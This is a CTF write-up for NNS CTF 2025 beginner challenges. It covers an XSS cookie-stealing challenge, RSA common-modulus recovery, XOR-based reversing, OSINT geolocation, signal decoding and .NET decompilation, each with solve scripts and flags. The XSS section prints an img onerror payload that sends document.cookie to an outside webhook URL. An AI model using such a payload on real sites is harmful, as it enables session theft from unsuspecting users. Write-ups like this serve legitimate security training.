NNS CTF 2025 - HackMD

# NNS CTF 2025 ## Beginner ### web-hacker This is a simple XSS challenge To steall cookie form other user, Many webhook free on internet but i using this website https://webhook-test.com/payload/b449a851-6dea-42f4-b596-bffd3a5e343e ```javascript= <img src="invalid.jpg" onerror="fetch('https://webhook-test.com/4efeee2a7e110f5e5520d53b5d20cacb?data=' + encodeURIComponent(document.cookie))"> ``` Then press Starting XSS Bot, you will get the flag like this ```json // QUERY_STRING: data=flag%3DNNS%7Bwow_you_are_so_1337_d09f2a1eb862%7D { "data": [ "flag=NNS{wow_you_are_so_1337_d09f2a1eb862}" ] } ``` ### babyrsa Source Code ```python= from Crypto.Util.number import getPrime, bytes_to_long, GCD # pip install pycryptodome m = bytes_to_long(b"NNS{??????????????????????}") e1 = 0x10001 e2 = getPrime(15) while True: p = getPrime(512) q = getPrime(512) n = p * q phi = (p-1)*(q-1) if GCD(e1, phi) == 1 and GCD(e2, phi) == 1: break c1 = pow(m, e1, n) c2 = pow(m, e2, n) print(f"n = 0x{n:x}") print(f"c1 = 0x{c1:x}") print(f"c2 = 0x{c2:x}") ''' n = 0x8fe414e9cba5d913f2d4c7bdcf15877cd75e5e48510e7b3e8b0b247562d88f22668a1c735455d2e24e20f0b07893e5f78a350e0f00799c3cbd4cf03096e8a6e00aa940112747ab086b3d4601a47f71dbdb9e4b15cb73cbe9227435ebd9b8e49100c82d7955f6f944a0d9a45b5e7251432f033b65000d9a13e0bde881c77a170b c1 = 0x194d261d91adc21bade438d216fd09e85c3952299b50377891aca43e7d5c4cb17025e5dda0b2030a58b8e22603f49f8af1382c1c30584e693e742231067f08fd5906571538d74a7348740a07abc61cfbdad80ff7bf56c95e3900e9fec45c830129b4dffa2c06569d0b8dc7f9c4c2bc7df1effaa561d584d65b62ce77c02af946 c2 = 0x1ad3f7583a30fc7a49ad56e99ca73c043b1faa8963a9f4c331d3d947717b50634a3cf7dab758b7e4e53cca0e2aeed26e0b9f591e4bb549cbb25c68089304b04d3ee65c0df67a7a3a159eaf1c4cc1fe0af0a45791871095f12f9a1d43b7915dee228b6098443f7d7149722c1eae3f5385e547444c8a8602a7f2e55c624b5b94d5 ''' ``` Payload ```python= from Crypto.Util.number import long_to_bytes, isPrime from sympy import primerange def egcd(a, b): if b == 0: return (1, 0, a) else: x, y, g = egcd(b, a % b) return (y, x - (a // b) * y, g) def try_recover(n, c1, c2, e1, e2): a, b, g = egcd(e1, e2) if g != 1: return None try: if a < 0: c1_inv = pow(c1, -1, n) part1 = pow(c1_inv, -a, n) else: part1 = pow(c1, a, n) if b < 0: c2_inv = pow(c2, -1, n) part2 = pow(c2_inv, -b, n) else: part2 = pow(c2, b, n) m = (part1 * part2) % n pt = long_to_bytes(m) return pt except Exception: return None n = 0x8fe414e9cba5d913f2d4c7bdcf15877cd75e5e48510e7b3e8b0b247562d88f22668a1c735455d2e24e20f0b07893e5f78a350e0f00799c3cbd4cf03096e8a6e00aa940112747ab086b3d4601a47f71dbdb9e4b15cb73cbe9227435ebd9b8e49100c82d7955f6f944a0d9a45b5e7251432f033b65000d9a13e0bde881c77a170b c1 = 0x194d261d91adc21bade438d216fd09e85c3952299b50377891aca43e7d5c4cb17025e5dda0b2030a58b8e22603f49f8af1382c1c30584e693e742231067f08fd5906571538d74a7348740a07abc61cfbdad80ff7bf56c95e3900e9fec45c830129b4dffa2c06569d0b8dc7f9c4c2bc7df1effaa561d584d65b62ce77c02af946 c2 = 0x1ad3f7583a30fc7a49ad56e99ca73c043b1faa8963a9f4c331d3d947717b50634a3cf7dab758b7e4e53cca0e2aeed26e0b9f591e4bb549cbb25c68089304b04d3ee65c0df67a7a3a159eaf1c4cc1fe0af0a45791871095f12f9a1d43b7915dee228b6098443f7d7149722c1eae3f5385e547444c8a8602a7f2e55c624b5b94d5 e1 = 0x10001 for e2 in primerange(2**14, 2**15): pt = try_recover(n, c1, c2, e1, e2) if pt and b"NNS{" in pt: print(f"[+] Found e2 = {e2}") print(pt) break # Result #└─$ python payload.py #[+] Found e2 = 31723 #b'NNS{g00d_y0u_kn0w_b4by_RS4}' ``` ### mandatory Using radare2 in linux to reverse program ```shell= $ r2 mandatory $ [0x000010e0]> aaa [0x000010e0]> afl 0x000010e0]> s main [0x000011c9]> pdf ``` ![image](https://hackmd.io/_uploads/BkXfu9eqex.png) So you will see that program using string byte in `0x000011fb` This is flag we need to find ```python= data = b"yydL@\x07@h\x06h[\x07A\x04hE\x04A\x04ED\x06YPJ" flag = bytes([b ^ 0x37 for b in data]) print(flag) ``` > └─$ python extract.py > b'NNS{w0w_1_l0v3_r3v3rs1ng}' ### Yo Doc > NNS{d1d_y0u_r34d_th3_d0c5_0r_d1d_y0u_c0n5ul7_th3_AI} ```python! from Crypto.Cipher import AES from Crypto.Util.Padding import pad import os flag = b"NNS{???????????????????????????????????????????????}" key = os.urandom(16) def encrypt(pt): iv = os.urandom(16) ct = AES.new(iv, AES.MODE_CFB, key, segment_size=128).encrypt(pad(pt, 16)) return iv.hex(), ct.hex() iv0, ct0 = encrypt(b"One documentation a day keeps the bugs away or whatever my doctor used to say") iv1, ct1 = encrypt(flag) print(f"{iv0 = }") print(f"{ct0 = }") print(f"{iv1 = }") print(f"{ct1 = }") ''' iv0 = '4858c64be12fbb05c648d6ef4be134a1' ct0 = 'f865533a29fa083996223e60d0b4a62be1e7cfac3ef1981ed53564b9eb2e2b36d28bfcaf6d656deb365e26c6d89782f9abd82b99f75a7b72c564b48a2598577492c459e089c798bf02c7fb621930ef84' iv1 = 'ef73d8fa5ce9521495abcea79f6a2d4b' ct1 = 'bd669aa9cb3ae0a46b46633eccd38a81c9e6c102f34d0809c3aa7cf6b824615cf9534275b23b97ce5a9efe039985dbcf5e3edc8266ff58c3629f40fe277e460c' ''' ``` Payload ### Touching Grass > NNS{u4mdsgt} I found this house through 1 blog on internet [Blog](https://zhuo.blogg.no/huset-i-kjosbukta-vagsbygd.html) House in Kjosdalen 51, Norway Using [GeoHash](https://www.geohash.es/encode) to locate that address and get the flag ### Viewing Pulses Using PulseView for decode ![image](https://hackmd.io/_uploads/rJJyt6-5ll.png) > NNS{an4lys1ng_pu1s35_t0_dec0d3_f1ag5} ### rtfm ![image](https://hackmd.io/_uploads/Sk8NPCZ9eg.png) ### DotDotDot Using Ilspycmd in Kali Linux to decomplie dll file Then you will get source code ```csharp= How can i crack this code and get flag using System; using System.Diagnostics; using System.Linq; using System.Reflection; using System.Runtime.CompilerServices; using System.Runtime.Versioning; using DotDotDot; [assembly: CompilationRelaxations(8)] [assembly: RuntimeCompatibility(WrapNonExceptionThrows = true)] [assembly: Debuggable(DebuggableAttribute.DebuggingModes.IgnoreSymbolStoreSequencePoints)] [assembly: TargetFramework(".NETCoreApp,Version=v8.0", FrameworkDisplayName = ".NET 8.0")] [assembly: AssemblyCompany("DotDotDot")] [assembly: AssemblyConfiguration("Release")] [assembly: AssemblyFileVersion("1.0.0.0")] [assembly: AssemblyInformationalVersion("1.0.0+857a2fd9dd60d4fefc846c7121b0fd221342ccd6")] [assembly: AssemblyProduct("DotDotDot")] [assembly: AssemblyTitle("DotDotDot")] [assembly: AssemblyVersion("1.0.0.0")] [module: RefSafetyRules(11)] [CompilerGenerated] internal class Program { private static void <Main>$(string[] args) { Console.WriteLine(" ____ _ ____ _ ____ _ \r\n| _ \\ ___ | |_| _ \\ ___ | |_| _ \\ ___ | |_ \r\n| | | |/ _ \\| __| | | |/ _ \\| __| | | |/ _ \\| __| \r\n| |_| | (_) | |_| |_| | (_) | |_| |_| | (_) | |_ _ _ _ \r\n|____/ \\___/ \\__|____/ \\___/ \\__|____/ \\___/ \\__(_|_|_)\n"); string input = "\u0011*8\u001eUd\n\vTG\u007fT\u00031VS\v\\\u000e\u00113U\u001b\u0015^\nI\u0011+V\u001c3\u000e\u0010=\u0013U\u0002I\u001fY:\u001a^\u0010V\u0015"; string source = "Tore Tang, ein gammal mann. Heile byen kjenne han, Han som leve av gammalt brod og vann. Kor han komme fra vett bare han, Tore Tang."; int offset = 17; XorStringDecryptor xorStringDecryptor = new XorStringDecryptorBuilder().SetKey(source.Select((char x) => (byte)x).ToArray()).Build(); CaesarStringDecryptor caesarStringDecryptor = new CaesarStringDecryptorBuilder().SetOffset(offset).Build(); string input2 = xorStringDecryptor.DecryptString(input); string text = caesarStringDecryptor.DecryptString(input2); Console.WriteLine("Enter the flag to check if it is right."); while (true) { Console.Write("> "); if (Console.ReadLine() == text) { break; } Console.WriteLine("Nope. Try again\n"); } Console.WriteLine("Correct, well done!"); } } namespace DotDotDot; public class CaesarStringDecryptor : IStringDecryptor { private readonly int _offset; public CaesarStringDecryptor(int offset) { _offset = offset; } public string DecryptString(string input) { string text = string.Empty; foreach (char c in input) { if (c >= 'A' && c <= 'Z') { int num = c - 65 - _offset; num += 26; num %= 26; text += (char)(65 + num); } else if (c >= 'a' && c <= 'z') { int num2 = c - 97 - _offset; num2 += 26; num2 %= 26; text += (char)(97 + num2); } else { text += c; } } return text; } } internal class CaesarStringDecryptorBuilder { internal int _offset; internal CaesarStringDecryptorBuilder SetOffset(int offset) { _offset = offset; return this; } internal CaesarStringDecryptor Build() { return new CaesarStringDecryptor(_offset); } } public interface IStringDecryptor { string DecryptString(string input); } public class XorStringDecryptor : IStringDecryptor { private byte[] _key; public XorStringDecryptor(byte[] key) { _key = key; } public string DecryptString(string input) { string text = string.Empty; for (int i = 0; i < input.Length; i++) { text += (char)(input[i] ^ _key[i % _key.Length]); } return text; } } public class XorStringDecryptorBuilder { internal byte[] _key = Array.Empty<byte>(); internal XorStringDecryptorBuilder SetKey(byte[] key) { _key = key; return this; } internal XorStringDecryptor Build() { return new XorStringDecryptor(_key); } } ``` Payload ```python= input_raw = "\u0011*8\u001eUd\n\vTG\u007fT\u00031VS\v\\\u000e\u00113U\u001b\u0015^\nI\u0011+V\u001c3\u000e\u0010=\u0013U\u0002I\u001fY:\u001a^\u0010V\u0015" source = "Tore Tang, ein gammal mann. Heile byen kjenne han, Han som leve av gammalt brod og vann. Kor han komme fra vett bare han, Tore Tang." offset = 17 key = [ord(x) for x in source] xor_res = ''.join(chr(ord(input_raw[i]) ^ key[i % len(key)]) for i in range(len(input_raw))) def caesar_decrypt(s, offset): out = [] for c in s: if 'A' <= c <= 'Z': out.append(chr((ord(c) - 65 - offset) % 26 + 65)) elif 'a' <= c <= 'z': out.append(chr((ord(c) - 97 - offset) % 26 + 97)) else: out.append(c) return ''.join(out) flag = caesar_decrypt(xor_res, offset) print(flag) ``` > NNS{d0tn3t_1s_e4s1ly_dec0mp1l3d_t0_s0urc3_c0de} ### breaker